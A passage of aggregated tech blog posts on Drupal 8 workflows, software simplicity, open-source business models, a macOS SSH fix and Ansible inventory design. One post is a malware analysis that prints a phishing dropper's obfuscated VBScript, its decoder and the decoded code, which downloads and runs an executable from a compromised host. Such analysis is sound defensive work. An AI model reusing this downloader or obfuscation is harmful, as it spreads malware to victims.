Let's say you manage a website with content that requires legal sign-off before it can be published. You can now create a new workflow state 'Needs legal sign-off' that is only accessible to people in your organization's legal department. In other words, you can set up content workflows that are simple (like the default one with just three states) or that are very complex (for a large organization with complex content workflows and permissions).

This functionality was already available in Drupal 7 thanks to contributed modules like the Workbench suite. Moving this functionality into core is useful for two reasons. First, it provides a much-requested feature out of the box – this capability meets the third most important feature request for content authors. Second, it encourages contributed modules to be built with configurable workflows in mind. Both should improve the end-user experience.

Support for different workflows in Drupal 8.3

Drupal 8.3 (still in development, planned to be released in April of 2017) goes one step further and introduces the concept of multiple types of workflows in the experimental Workflows module. This provides a more intuitive way to set up different workflows for different content types. For example, blog posts might not need legal sign-off but legal contracts do. To support this use case, you need to be able to setup different workflows assigned to their appropriate content types.

What is also interesting is that the workflow system in Drupal 8.3 can be applied to things other than traditional content. Let's say that our example site happens to be a website for a membership organization. The new workflow system could be the technical foundation to move members through different workflows (e.g. new member, paying member, honorary member). The reusability of Drupal's components has always been a unique strength and is what differentiates an application from a platform. By enabling people to reuse components in interesting ways, we turn Drupal into a powerful platform for building many different applications.

Drupal 8.3 will support multiple different editorial workflows. Each workflow can define its own workflow states as well as the possible transitions between them. Each transition has permissions associated with it to control who can move content from one state to another.
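
To make this more concrete, here is a rough, hypothetical sketch of what such a workflow might look like as an exported configuration file. The key names and nesting are illustrative only and may not match the exact schema of the experimental module, but they show the idea of states plus the transitions between them:

# Illustrative sketch only, not the authoritative core schema.
id: editorial
label: Editorial
type: content_moderation
type_settings:
  states:
    draft:
      label: Draft
      published: false
    needs_legal_signoff:
      label: Needs legal sign-off
      published: false
    published:
      label: Published
      published: true
  transitions:
    send_to_legal:
      label: Send to legal
      from: [draft]
      to: needs_legal_signoff
    publish:
      label: Publish
      from: [needs_legal_signoff]
      to: published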

Workspace interactions under design

While workflows for individual content items is very powerful, many sites want to publish multiple content items at once as a group. This is reflected in the fourth-most requested feature for content authors, 'Staging of multiple content changes'. For example, a newspaper website might cover the passing of George Michael in a dedicated section on their site. Such a section could include multiple pages covering his professional career and personal life. These pages would have menus and blocks with links to other resources. 'Workspaces' group all these individual elements (pages, blocks and menus) into a logical package, so they can be prepared, previewed and published as a group. And what is great about the support for multiple different workflows is that content workflows can be applied to workspaces as well as to individual pieces of content.

We are still in the early stages of building out the workspace functionality. Work is being done to introduce the concept of workspaces in the developer API and on designing the user interface. A lot remains to be figured out and implemented, but we hope to introduce this feature in Drupal 8.5 (planned to be released in Q2 of 2018). In the mean time, other Drupal 8 solutions are available as contributed modules.

An outside-in design that shows how content creators could work in different workspaces. When you're building out a new section on your site, you want to preview your entire site, and publish all the changes at once. Designed by Jozef Toth at Pfizer.

Closing thoughts

We discussed work on content workflows and workspaces. The changes being made will also help with other problems like content recovery, cross-site content staging, content branching, site previews, offline browsing and publishing, and audit logs. Check out the larger roadmap of the workflow initiative and the current priorities. We have an exciting roadmap and are always looking for more individuals and organizations to get involved and accelerate our work. If you want to get involved, don't be afraid to raise your hand in the comments of this post.

Thank you

I tried to make a list of all people and organizations to thank for their work on the workflow initiative but couldn't. The Drupal 8 workflow initiative borrows heavily from years of hard work and learnings from many people and organizations. In addition, there are many people actively working on various aspects of the Drupal 8 workflow initiative. Special thanks to Dick Olsson (Pfizer), Jozef Toth (Pfizer), Tim Millwood (Appnovation), Andrei Jechiu (Pfizer), Andrei Mateescu (Pfizer), Alex Pott (Chapter Three), Dave Hall (Pfizer), Ken Rickard (Palantir.net) and Ani Gupta (Pfizer). Also thank you to Gábor Hojtsy (Acquia) for his contributions to this blog post.

January 05, 2017

January 03, 2017

During the holidays we have performed some interviews with main track speakers from various tracks. To get up to speed with the topics discussed in the main track talks, you can start reading the following interviews: Benjamin Kampmann: It's time to SAFE the Internet. Introducing SAFE, the decentralised privacy-first storage and communication network Dominik George and Eike Jesinghaus: The Veripeditus AR Game Framework. Enabling everyone to freely create Augmented Reality Games Ed Schouten: CloudABI: easily develop sandboxed apps for UNIX Martin Pitt: Continuous Integration at a Distribution Level. Shepherding 30.000 packages to never break Mathieu Stephan: The Making of a…

January 02, 2017

Simplicity is possibly the single most important thing on the technical side of software development. It is crucial to keep development costs down and external quality high. This blog post is about why simplicity is not the same thing as easiness, and common misconceptions around these terms.

Simple is not easy

Simple is the opposite of complex. Both are a measure of complexity, which arises from intertwining things such as concepts and responsibilities. Complexity is objective, and certain aspects of it, such as Cyclomatic Complexity, can be measured with many code quality tools.

Easy is the opposite of hard. Both are a measure of effort, which unlike complexity, is subjective and highly dependent on the context. For instance, it can be quite hard to rename a method in a large codebase if you do not have a tool that allows doing so safely. Similarly, it can be quite hard to understand an OO project if you are not familiar with OO.

Achieving simplicity is hard

I’m sorry I wrote you such a long letter; I didn’t have time to write a short one.

Blaise Pascal

Finding simple solutions, or brief ways to express something clearly, is harder than finding something that works but is more complex. In other words, achieving simplicity is hard. This is unfortunate, since dealing with complexity is so hard.

Since in recent decades the cost of software maintenance has become much greater than the cost of its creation, it makes sense to make maintenance as easy as we can. This means avoiding as much complexity as we can during the creation of the software, which is a hard task. The cost of the complexity does not suddenly appear once the software goes into an official maintenance phase, it is there on day 2, when you need to deal with code from day 1.

Good design requires thought

Some people in the field conflate simple and easy in a particularly unfortunate manner. They reason that if you need to think a lot about how to create a design, it will be hard to understand the design. Clearly, thinking a lot about a design does not guarantee that it is good and minimizes complexity. You can do a good job and create something simple or you can overengineer. The one safe conclusion you can make based on the effort spent is that for most non-trivial problems, if little effort was spent (by going for the easy approach), the solution is going to be more complex than it could have been.

One high-profile case of such conflation can be found in the principles behind the Agile Manifesto. While I don’t fully agree with some of the other principles, this is the only one I strongly disagree with (unless you remove the middle part). Yay Software Craftsmanship manifesto.

Simplicity–the art of maximizing the amount of work not done–is essential

Principles behind the Agile Manifesto

Similarly we should be careful to not confuse the ease of understanding a system with the ease of understanding how or why it was created the way it was. The latter, while still easier than the actual task of creating a simple solution, is still going to be harder than working with said simple solution, especially for those that lack the skills used in its creation.

Again, I found a relatively high-profile example of such confusion:

If the implementation is hard to explain, it’s a bad idea. If the implementation is easy to explain, it may be a good idea.

The Zen of Python

I think this is just wrong.

You can throw all books in a library onto a big pile and then claim it’s easy to explain where a particular book is – in the pile – though actually finding the book is more of a challenge. It’s true that more skill is required to use the library effectively than going through a pile of books randomly. You need to know the alphabet and be familiar with genres of books. It is also true that sometimes it does not make sense to invest in the skill that allows working more effectively, and that sometimes you simply cannot find people with the desired skills. This is where the real bottleneck is: learning. Most of the time these investments are worth it, as they allow you to work both faster and better from that point on.

See also

In my reply to the Big Ball of Mud paper I also talk about how achieving simplicity requires effort.

The main source of inspiration that led me to this blog post is Rich Hickey’s 2012 Rails Conf keynote, where he starts by differentiating simple and easy. If you don’t know who Rich Hickey is (he created Clojure), go watch all his talks on YouTube now, well worth the time. (I don’t agree with everything he says but it tends to be interesting regardless.) You can start with this keynote, which goes into more detail than this blog post and adds a bunch of extra goodies on top. <3 Rich

Following the reasoning in this blog post, you cannot trade software quality for lower cost. You can read more about this in the Tradable Quality Hypothesis and Design Stamina Hypothesis articles.

There is another blog post titled Simple is not easy, which as far as I can tell, differentiates the terms without regard to software development.

January 01, 2017

Yet, another exciting year, learning new skills and meeting new people, here are some highlights of 2016 :
  • visited FOSDEM; giving a lightning talk about Buildtime Trend; meeting Rouslan, Eduard, Ecaterina and many others
  • attended a Massive Attack concert in Paleis 12.
  • visited Mount Expo, the outdoor fair organised by KBF
  • saw some amazing outdoor films on the BANFF film festival
  • spent a weekend cleaning routes with the Belgian Rebolting Team (BRT) in Comblain-La-Tour. On Sunday we did some climbing in Les Awirs, where I finished a 6b after trying a few times.
  • First time donating blood plasma
  • First academic publication (as co-author) : https://biblio.ugent.be/publication/7204792
  • Climbing trip to Gorges du Tarn with Vertical Thinking : climbing 6 days out of 7 (one day of rain), doing multipitch Le Jardin Enchanté, sending a lot of 5, 6a and 6a+ routes, focusing on reading the route, looking for footholds and taking small steps.
  • Some more route cleaning with BRT, this time in Flône, removing loose rock and preparing to open new routes.
  • went to DebConf16 in Cape Town, talked about 365 days of Open Source (video) and made a first contribution to Debian.
  • Visited South Africa and climbed in Rocklands/Cederberg
  • became a (Junior Developer) member of the Debian MySQL Maintainers Team
  • 10th blood/plasma donation
  • visited Amsterdam for the MariaDB developers meetup
  • climbing trip to Orpierre in France. It was cold during the night, but as soon as the sun came out it was T-shirt weather. Plenty of climbing with Adriaan, Mathias, Bert, Stijn and Corentin (a local French climber): a very nice multipitch (Diedre Sud, 7 5b/5c pitches) and quite a few 5's and 6's single pitch routes, with a few 6a's leading and 2 6b's toprope.
  • Another cleaning weekend with BRT, learning how to glue bolts. Slipped on a greasy forest trail and bruised a rib.
  • went to 33C3 in Hamburg : 4 days of talks about IT, technology, science, security and privacy.
  • celebrating New Year's Eve in Ghent with some friends, good food and an exciting quiz

Plans for 2017 :
  • Clean some rock with BRT, climb, both indoor and do a few climbing trips
  • Conferences : FOSDEM, DebConf, FrosCon, 34C3
  • Contribute to Debian and MariaDB

December 31, 2016

The post In 2017, I’m going to stop watching the news appeared first on ma.ttias.be.

I've stopped watching the news a few months ago and it's definitely a trend I'm planning to continue in 2017.

We live in a world of information. Open Facebook and you see dozens of articles about topics your friends are interested in. Open Twitter and you'll see yet another death of a celebrity. Open a news app and you'll read about plane crashes, terrorist threats, immigration, warzones and Syria.

Ask yourself a simple question though: what can you do about that?

Absolutely nothing.

Stop reading the news

A few months ago I removed all news apps from my phone, which was my primary source of mainstream news. Those are the kind of apps that want you to read every article by making headlines look as scary or unbelievable as possible.

But you really don't need an app to tell you that:

  • There are still refugees on the run from Syria and Libya
  • There are going to be terrorist attacks all over the world, taking hundreds of lives
  • Trump is going to be president in 2017
  • Some celebrity is going through some kind of scandal

You can fairly accurately predict what the news of next week is going to be. Or better yet: you can predict what news outlets are going to cover next week.

Be an ostrich

Bury your head in the sand.

Having nothing but bad news thrown at you every single day isn't going to make you happier if you can't do anything about it.

You know what makes you happier in life? Making things better, making someone else happy, doing the things you love and care about.

I'd much rather read about local initiatives helping people, where my actions or donations can actually make a difference.

Sure, I can donate 50$ of tax-deductible money to the Red Cross to help them, but what's my 50$ going to do? It's not going to make a meaningful difference (1) and won't make me feel any better.

News about the things you care about

I love technology, innovation, gadgets, open source, Linux, ... and all things nerdy. Heck, I even devoted a weekly newsletter to it.

So to satisfy my hunger for information I'll still read Hacker News, the /r/linux and /r/programming subreddits and a handful of other websites.

But I choose what kind of news I want to see. And mainstream media isn't going to be on that list.

(1) I know what you're thinking: what if everyone stops donating? I'm not saying to stop donating, just focus on charities or help where your efforts make a meaningful difference. Not 0.000001% of the donations.

The post In 2017, I’m going to stop watching the news appeared first on ma.ttias.be.

December 30, 2016

Several people have commented on social media that last week's TAG Heuer post was a subtle (or not so subtle) gift request. In all honesty, it wasn't. That changes this week as I just learned that Lamborghini relaunched its website using Drupal 8. If anyone wants to gift a Lamborghini, don't hesitate to. Joking aside, it's great to see another famous brand use Drupal 8, including Drupal 8's new multi-lingual features. Check it out at https://www.lamborghini.com!

December 29, 2016

Commercial open-source software is usually based around some kind of asymmetry: the owner possesses something that you as a user do not, allowing them to make money off of it.

This asymmetry can take on a number of forms. One popular option is to have dual licensing: the product is open-source (usually GPL), but if you want to deviate from that, there’s the option to buy a commercial license. These projects are recognizable by the fact that they generally require you to sign a Contributor License Agreement (CLA) in which you transfer all your rights to the code over to the project owners. A very bad deal for you as a contributor (you work but get nothing in return) so I recommend against participating in those projects. But that’s a subject for a different day.

Another option for creating asymmetry is open core: make a limited version open-source and sell a full-featured version. Typically named "the enterprise version". Where you draw the line between both versions determines how useful the project is in its open-source form versus how much potential there is to sell it. Most of the time this tends towards a completely useless open-source version, but there are exceptions (e.g. Gitlab).

These models are so prevalent that I was pleasantly surprised to see how Sentry does things: as little asymmetry as possible. The entire product is open-source and under a very liberal license. The hosted version (the SaaS product that they sell) is claimed to be running using exactly the same source code. The created value, for which you'll want to pay, is in the belief that a) you don't want to spend time running it yourself and b) they'll do a better job at it than you do.

This model certainly won’t work in all contexts and it probably won’t lead to a billion dollar exit, but that doesn’t always have to be the goal.

So kudos to Sentry, they’re certainly trying to make money in the nicest way possible, without giving contributors and hobbyists a bad deal. I hope they do well.

More info on their open-source model can be read on their blog: Building an Open Source Service.



In this era of Open Government, constituents expect to be offered great services online. This can require moving an entire government to a new digital platform in order to deliver ambitious digital experiences that support the needs of citizens. It takes work, but many governments from the United States to Australia have demonstrated that with the right technology and strategy in place, governments can successfully adopt a new platform. Unfortunately this is not always the case.

How not to do it: Canada.ca

In 2014, the Government of Canada began a project to move all of its web pages onto a single site, Canada.ca. A $1.54 million contract for a content management system was awarded to a proprietary vendor in 2015. Fast forward to today, and the project is a year behind schedule and 10x over budget. The contract is now approaching $10 million. As only 0.05% of the migration to Canada.ca has been completed, many consider the current project to be a disservice to its citizens.

I find the impending outcomes of this project to be disheartening as current timelines suggest that the migration will continue to be delayed, run over budget, and strain taxpayers. While I hope that Canada.ca will develop into a valuable resource for its citizens, I agree with Tom Cochran, Acquia's Chief Digital Strategist for Public Sector -- who ran digital platforms at the White House and U.S. Department of State -- that the prospects for Canada.ca are dim given the way the project was designed and is being implemented.

The root of Canada.ca's problem appears to be the decision to migrate 1,500 departments and 17 million pages into a single site. I'm guessing that the goal of having a single site is to offer citizens a central entry point to connect with their government. A single site strategy can be extremely effective, for example the City of Boston's single site is home to over 200,000 web pages spanning 120 city departments, and offers a truly user-centric experience. With 17 million pages to migrate, Canada.ca is eighty-five times bigger than Boston.gov. A project of this magnitude should have considered using a multi-site approach where different agencies and departments have their own sites, but can use a common platform, toolset and shared infrastructure.

While difficulties with Canada.ca may have started with the ambitious attempt to move every department to a single domain, the complexities of this strategy are likely amplified through the implementation of a single-source proprietary solution. I find it unfortunate that Canada's procurement models did not favor Open Source. The Canadian government has a tenured history of utilizing Open Source, and there is a lot of existing Drupal talent in the country. In rejecting an open platform, the Canadian Government lost the opportunity to engage a skilled community of native, Open Source developers.

How to do it: Australian Government

Transforming an entire nation's digital strategy is challenging, but other public sector leaders have proven it is possible. Take the Australian Government. In 2015, John Sheridan, Sharyn Clarkson and their team in the Department of Finance moved their department's site from a legacy environment to Drupal and the cloud. The Department of Finance's success has grown into the Drupal distribution govCMS, which is currently supporting over 52 government agencies across 6 jurisdictions in Australia. Much like Canada.ca, the goal of govCMS is to provide citizens with a more intuitive platform to engage with their government.

The guiding principle of govCMS is to govern but to not seek control. Each government department requires flexibility to service the needs of their particular audiences. While single-site solutions do work as umbrellas for some organizations, the City of Boston being a great example, most large (government) organizations that have a state-of-the-art approach follow a hub and spoke model where different sites share code, templates and infrastructure. While sharing is strongly encouraged it is not required. This allows each department to independently innovate and adopt the platform how they choose.

The Open Source nature of govCMS has encouraged both innovation and collaboration across many Australian departments. One of the most remarkable examples of this is that a federal agency and a state agency coordinated their development efforts to build a data visualization capability on an open data CKAN repository. The Department of Environment initiated the development of the CKAN module necessary to pull and analyze data from a variety of departments. The Victorian Department of Premier and Cabinet recognized that they too could utilize the module to propel their budget report and aided in the co-development of the govCMS CKAN. This is an incredible example of how Open Source allows agencies to extend functionality across departments, regardless of vendor involvement. By setting up a model which removed the barriers to share, govCMS has provided Australia the freedom to truly innovate.

Seeing is believing: shifting the prevailing mindset

A distributed model using multiple sites to leverage an Open Source platform where infrastructure, code and templates are shared allows for governance and innovation to co-exist. I've written about this model here in a post about Loosening control the Open Source Way. I believe that a multi-site approach based on Open Source is the only way to move an entire government to a new digital strategy and platform.

It can be incredibly hard for organizations to understand this. After all, this is not about product features, technical capabilities or commercial support, but about a completely different way of working and innovating. It's a hard sell because we have to change the lens through which organizations see the world; away from procuring proprietary software that provides perceived safety and control, to a world that allows frictionless innovation and sharing through the loosening of control without losing control. For us to successfully market and sell the innovation that comes out of Drupal, Open Source and cloud, we have to shift how people think and challenge the prevailing model.

In many ways, organizations have to see it to believe it. What is exciting about the Australian government is that it helps others see the potential of a decentralized service model predicated on Open Source software with a Drupal distribution at its heart. The Australian government has created an ecosystem of frictionless sharing that is cheaper and faster, and that enables better results.

What is next for Canada?

It's difficult for me to see a light at the end of the tunnel for Canadian citizens. The Canadian government can stay the course (and all indications so far are that it will), but that path comes with a high price tag, long delays and slow innovation. An alternative would be for Ottawa to hit the pause button and reassess its strategy. It could look externally at how governments in Washington, Canberra and countless other capitals have approached their mission to support the digital needs of their citizens. I know there are countless Drupal experts, working both within the government and at dozens of Drupal agencies throughout Canada, who are eager to show their government a better way forward.

December 28, 2016

A minor annoyance after my Mac decided to auto-update to OSX 10.12.2: every time I wanted to SSH to a server, it kept prompting for my SSH key passphrase.

$ ssh ma.ttias.be
Enter passphrase for key '/Users/mattias/.ssh/id_rsa':

It used to save that info in the Keychain, which got unlocked whenever I unlocked the Mac.

There's a quick workaround offered by Aral that seems to work fine for me.

$ cat ~/.ssh/config
Host *
  UseKeychain yes

Add that UseKeychain yes line to your ~/.ssh/config file and it forces the SSH client to use the Keychain.
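
If you also want keys added to the ssh-agent automatically, the same workaround is commonly extended with the AddKeysToAgent option (introduced in OpenSSH 7.2, so it should be available on Sierra):

$ cat ~/.ssh/config
Host *
  UseKeychain yes
  AddKeysToAgent yes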

The reason is that the latest update comes bundled with a newer OpenSSH package that changes some default behaviour.

Prior to macOS Sierra, ssh would present a dialog asking for your passphrase and would offer the option to store it into the keychain. This UI was deprecated some time ago and has been removed.

Instead, a new UseKeychain option was introduced in macOS Sierra allowing users to specify whether they would like for the passphrase to be stored in the keychain. This option was enabled by default on macOS Sierra, which caused all passphrases to be stored in the keychain.

This was not the intended default behavior, so this has been changed in macOS 10.12.2.
OpenSSH updates in macOS 10.12.2

That solved it for me.

The post Mac OSX keeps prompting SSH key passphrase, does not use KeyChain appeared first on ma.ttias.be.

You may have noticed (but you probably did not) that on 2017-02-04, at 14:00, in room UB2.252A (aka "Lameere"), which at that point in time will be the Virtualisation and IaaS devroom, I'll be giving a talk on the Network Block Device protocol.

Having been involved in maintaining NBD in one way or another for over fifteen years now, I've never seen as much activity around the concept as I have in the past few years. The result of that has been that we've added a number of new features to the protocol, to allow it to be used in settings where it was not as useful or as attractive as it would have been before. As a result, these are exciting times for those who care about NBD, and I thought it would be about time that I'd speak about it somewhere. The Virtualisation/IaaS devroom seemed like the right fit today (even though I wouldn't have thought so a mere two years ago), and so I'm happy they agreed to have me.

While I still have to start writing my slides, and therefore don't really know (yet) exactly what I'll be talking about, the schedule already contains an outline.

See you there?

December 24, 2016

It certainly isn’t the desktop. But nonetheless, it’s all over the place.

December 23, 2016

Yes, what was I thinking...

* 20160915: ordered a DSL line at dommel.be. They already had all my contact data and other permissions, so that administrative bit went quickly. It would turn out to be the only quick and easy bit... I tell them five times that this will be a new line that needs to be dug in, because whatever there might have been has disappeared during renovations.
* 201610??: First proximus technician visit. He returns home: "There's no line here. My data says there was a line here."
* 201610??: 
* 20161021: an ->A<-DSL line gets delivered instead of VDSL. It seems something went wrong during the order process (possibly on my side?).
* 20161021: I agree to pay a 25€ "reduced" upgrade fee and immediately order an upgrade to VDSL.
* Nothing happens for two weeks...
* Nothing happens for three weeks...
* /me calls Dommel. Dommel: "You will have to wait until your payment for the upgrade has been processed." "But... you have had direct debit permission on my account for two years now?" "Yes, but our administrative system doesn't allow that..."
* The payment eventually clears. /me calls them. "Yes, this week or the next, we will be able to make an appointment with a technician..."
* Another three weeks pass. No news. I call them. "In two or three weeks, we will be able to make an appointment with a technician"
* A few days later, Dommel informs me a proximus technician will visit on December 22...
* 20161222: Another proximus technician visits and connects the VDSL2 line.
* 20161222: I triple-check with Dommel by phone whether everything will be fine, and what I should do. "Didn't you receive a USB stick with the configuration on it?" "No?" "Oh!" "So what to do now?" "We'll send you the required settings by email..."
* 20161223: Back home, I immediately test the settings. The DSL line syncs (70/20), but PPPoE times out... Phone call to the Dommel help line. "Wait for an hour or so, things will be fine..." Four more phone calls later that afternoon... A Proximus technician is scheduled to drop by between 8am and noon... on 20161227. Not sure what he or she will be able to do. Let's hope for the best...

Growing up, my dad had a watch from TAG Heuer. As a young child, I always admired his watch and wished that one day I'd have one as well. I still don't have a TAG Heuer watch, but I just found out that TAG Heuer relaunched its website using Drupal 8, and that is pretty cool too.

TAG Heuer's new website integrates Drupal 8 with their existing Magento commerce platform to provide a better, more content-rich shopping experience. It is a nice example of the "Content for Commerce" opportunity that I wrote about a month ago. Check it out at https://www.tagheuer.com!

A quick blog post about a malicious VBScript macro that I analysed… Bad guys always have plenty of ideas to obfuscate their code. The macro was delivered via a classic phishing email with an attached zip archive that contained a Windows .lnk file. The link contained a simple call to cmd.exe with a very long "echo" line to write a VBScript file to the local disk and execute it:

cmd.exe /c echo DATA >file.txt&&wscript //E:VBScript file.txt!%SystemRoot%\system32\SHELL32.DLL

The "DATA" dumped to file.txt has been beautified to make it easier to read:

Set ak=GetObject("winmgmts:\\.\root\cimv2")
Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0
    Kj2=Kj1.ScreenWidth
    Kj3=Kj1.ScreenHeight
    Next
Kj5="hojiupO>mmfiTkcp!ufT;*##fyf/v##)dfyF/mmfiTkcp>dfyFkcp!ufT;*##mmfiT/uqjsdTX##)udfkcPfubfsD>mmfiTkcp!ufT;hojiupO>Jd!uft;hojiupO>gG!uft;hojiupO>7z!uft;uyfo;***2-MN-zepcftopqtfs/gG)cejn)cdtb)sid!fujsx/Jd;*zepcftopqtfs/gG)cofm!pu!2>MN!spg;eoft/gG;ftmbg-##fyf/g0tfmuju0ht/npd/zufjdptihji00;quui##-##UFH##!ofqp/gG;*##fyf/v##)fmjguyfufubfsd/7z>Jd!uft;*##2/6/utfvrfsquuiojx/quuiojx##)udfkcpfubfsd>gG!uft;*##udfkcpnfutztfmjg/hojuqjsdt##)udfkcpfubfsd>7z!uft"
execute(Replace(Kj4(Kj5,CStr(int(CInt((Kj2))/CInt((Kj3))))),chr(34)+chr(34),chr(34)))
Function Kj4(SP,IV)
    Dim s2,Op,Vz,d4,BQ:BQ=""
    s2=Len(IV)
    Op=1
    Vz=Len(SP)
    SP=StrReverse(SP)
    For d4=Vz To 1 Step -1
        BQ=BQ+chr(asc(Mid(SP,d4,1))-Asc(Mid(IV,Op,1))+48)
        Op=Op+1
        If Op Then Op=1 End If
        Next
    BQ=StrReverse(BQ)
    Kj4=BQ
End Function

As you can see, the variable Kj5 seems to be the most interesting and contains the obfuscated code. The script starts by connecting to WMI objects on the local computer (represented by the “.”):

Set ak=GetObject("winmgmts:\\.\root\cimv2")

Then it grabs the screen resolution from the Win32_DesktopMonitor object:

Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0
    Kj2=Kj1.ScreenWidth
    Kj3=Kj1.ScreenHeight
    Next

This technique could be used for sandbox detection (many sandboxes use a low screen resolution by default) but that's not the case here. The width and height are converted to integers and the width is divided by the height, which almost always returns "1". You would need an unusual resolution where height > width, or an ultra-wide monitor, to get a different result. This value "1" is passed to the function Kj4(), which deobfuscates the long string. The function processes the characters one by one (character value - 49 + 48, i.e. a shift of one: 'h' becomes 'g', 'o' becomes 'n', etc.) and, through the two StrReverse() calls, ends up reversing the string. The result is then ready to be executed:

set y6=createobject("scripting.filesystemobject")
set Ff=createobject("winhttp.winhttprequest.5.1")
set cI=y6.createtextfile("u.exe")
Ff.open "GET","hxxp://highsociety.com.sg/titles/f.exe",false
Ff.send
for ML=1 to lenb(Ff.responsebody)
    cI.write chr(ascb(midb(Ff.responsebody,ML,1)))
    next
set y6=Nothing
set Ff=Nothing
set cI=Nothing
Set objShell=CreateObject("WScript.Shell")
Set objExec=objShell.Exec("u.exe")
Set objShell=Nothing

A classic HTTP connection is performed to drop the payload from a compromised server. Note that the macro did not work in my Windows 10 sandbox (empty values were returned instead of the screen width/height) but it worked on Windows 7.
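
For reference, the decoder is easy to re-implement outside VBScript. Here is a minimal Python equivalent (variable names are mine) reproducing the shift-and-reverse logic of Kj4() and the final double-quote replacement:

def kj4(sp, iv):
    # Subtract the key characters (iv is "1" here, i.e. a constant shift of -1)
    # and reverse the result; this is the net effect of the two StrReverse() calls.
    out = []
    op = 0
    for ch in sp:
        out.append(chr(ord(ch) - ord(iv[op]) + 48))
        op = (op + 1) % len(iv)
    return "".join(reversed(out))

# decoded = kj4(Kj5, "1").replace('""', '"')   # mirrors the VBScript Replace() call
# print(decoded)  # -> the "set y6=createobject(...)" script shown above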

 

[The post Using Monitor Resolution as Obfuscation Technique has been first published on /dev/random]

December 22, 2016

While still working on a few other projects, one of the time consumers of the past half year (haven't you noticed? my blog was quite silent) has come to an end: the SELinux System Administration - Second Edition book is now available. With almost double the number of pages and a serious update of the content, the book can now be bought either through Packt Publishing itself, or through the various online bookstores such as Amazon.

With the holidays now approaching, I hope to be able to execute a few tasks within the Gentoo community (and of the Gentoo Foundation) and get back on track. Luckily, my absence was not jeopardizing the state of SELinux in Gentoo thanks to the efforts of Jason Zaman.

December 21, 2016

December 20, 2016

[update] next post in this series: Ansible Inventory 2.0 design rules

In my previous post, "Current state of the Ansible inventory and how it might evolve", I explained some parts of the Ansible inventory internals and pointed out some features I would like to improve.

Whilst this exercise might be interesting for Ansible and specifically its internal inventory, it might also just be an idea for an external application that yields a flattened inventory (through an inventory plugin / dynamic script), or it might be interesting to see whether other configuration management tools could make use of it, as some sort of central or "single source of truth".

Whereas the current inventory has simple groups that hold child groups, have parent groups, and can contain hosts, I believe a more rigid structure with more meta information would be beneficial. Not only to manage group trees, but also to manage the variables assigned and defined in those groups, and to manage their values throughout the parent-child inheritance.

Next up are some design ideas I have been playing with; a minimal sketch of the resulting data model follows the list below. A big part of this is that, to me, managing inventory is much more about managing variable sets and their values than about just grouping hosts.

  1. inventory starts top level with a special root group. A bit like the all group we currently have. The root group is the only one that has 0 parents, and has one or more normal child groups. These child groups are the root groups for a subtree;
  2. a subtree holds sets of variables. ideally, a particular variable only lives in one single subtree;
  3. a normal group has 1 parent, and one or more child groups;
  4. a merge group is a special group that can have more than one parent groups, but each parent must be member of a different subtree;
    • a merge group would typically merge sets of variables from different subtrees;
    • ideally a var does not exist in different parent trees, as to not have to deal with arbitrary precedence;
    • but maybe such a var holds e.g. a virtual host, and should at merge time become a list of virtual hosts, to be deployed on an apache instance;
    • care should be taken when a particular variable exists in different trees;
  5. a merge group could also be cluster or instance group, or have such groups as a child, which means it has no child groups, but holds only hosts;
    • merge groups could also be dynamic: a child of the postgres group and of the testing group would yield a postgres-test group
    • those groups need to track which subtrees they have in their ancestors
    • instead of tracking subtrees, perhaps track variable sets (and have a rule where a var can only exist in one set)
  6. a cluster group could keep track of which host in its group is the master (e.g. it's a mysql master-slave cluster); such a property is of course dynamic; this would help to write playbooks that only have to run once per cluster, and on the master;
  7. a host can be member of different merge or cluster groups, e.g. when that hosts holds multiple roles. e.g. as a single LAMP stack, it runs mysql (with different databases) and apache (with different virtual hosts)
    • inheriting from multiple groups that are members of the same subtree means something like having multiple instances of an application, or virtual hosting applied on a host
    • this might be where the description for an application gets translated to what is needed to configure that application on one or more hosts
    • multiple app instances, can be bundled on a host, and more of them can be spread on multiple hosts
    • a single variable might need to become a list on a specific instance
  8. merging groups is actually about merging the variables they hold
  9. a variable set is (meta) defined in a subtree; some vars might have a default, and some vars need to be updated when that default changes (perhaps a new dns server in your DC), whilst others may not be updated (the Java version your application was deployed with);
  10. at some point I tinkered with the idea of location groups/trees, which might be something more separate from classic organisational and application-focused groups, to manage things like geographic location, datacenter, etc., but I'm not sure this still warrants a special kind of group;
    • a geographical group membership could perhaps change the domain name of a URL
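
To make the rules above more concrete, here is a minimal Python sketch of the data model; the class and attribute names are mine, not Ansible's, and it only illustrates rules 1, 3, 4 and 8.

from dataclasses import dataclass, field
from typing import Dict, List, Optional

@dataclass
class Group:
    """A normal group: exactly one parent (rule 3), any number of children."""
    name: str
    parent: Optional["Group"] = None
    children: List["Group"] = field(default_factory=list)
    variables: Dict[str, object] = field(default_factory=dict)

    def add_child(self, child: "Group") -> "Group":
        child.parent = self
        self.children.append(child)
        return child

    def subtree_root(self) -> "Group":
        # The subtree root is the group directly below the special root group (rule 1).
        node = self
        while node.parent is not None and node.parent.parent is not None:
            node = node.parent
        return node

@dataclass
class MergeGroup:
    """A merge group combines variable sets from different subtrees (rules 4 and 8)."""
    name: str
    parents: List[Group] = field(default_factory=list)

    def add_parent(self, parent: Group) -> None:
        # Rule 4: every parent must live in a different subtree.
        if parent.subtree_root().name in {p.subtree_root().name for p in self.parents}:
            raise ValueError("parents of a merge group must come from different subtrees")
        self.parents.append(parent)

    def merged_vars(self) -> Dict[str, object]:
        # Rule 8: merging groups is really about merging the variables they hold.
        merged: Dict[str, object] = {}
        for p in self.parents:
            merged.update(p.variables)
        return merged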

But the point of all this is primarily to manage variables in the inventory: to be able to parametrize an application, to describe that application in a perhaps more high-level way. Inventory should then allow you to transpose those values in a way that easily applies to the host-based execution level (the playbooks and roles). This also includes a way to Puppet-style "export" resources to other hosts.

Roles can be written and used in two ways when deploying multiple instances of an application: (1) the role defines a basic application and is called multiple times, perhaps as a parameterized role (but role: with_items: might be needed, and that is currently not possible in Ansible); and (2) the role itself loops over a list of instances, where the inventory translates membership of multiple apache virtualhost instances into a list of virtual hosts per Ansible host.

The latter might be a more generic way of exporting resources. An example. Some subtree manages the setup of a single apache site. At some point multiple sites are defined. Sites will be grouped and installed on one of multiple apache setups. Here you happen to export virtual hosts into a list of virtualhosts for one apache. In a next step, *all* those virtualhosts get exported in a big list that configures your load balancer.

We need some generic way to create lists of things grouped by a certain parameter, as the sketch below illustrates.
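
As a rough illustration (the data and key names below are invented), regrouping per-instance definitions by a parameter, and flattening them again for another consumer, is straightforward once the inventory exposes them:

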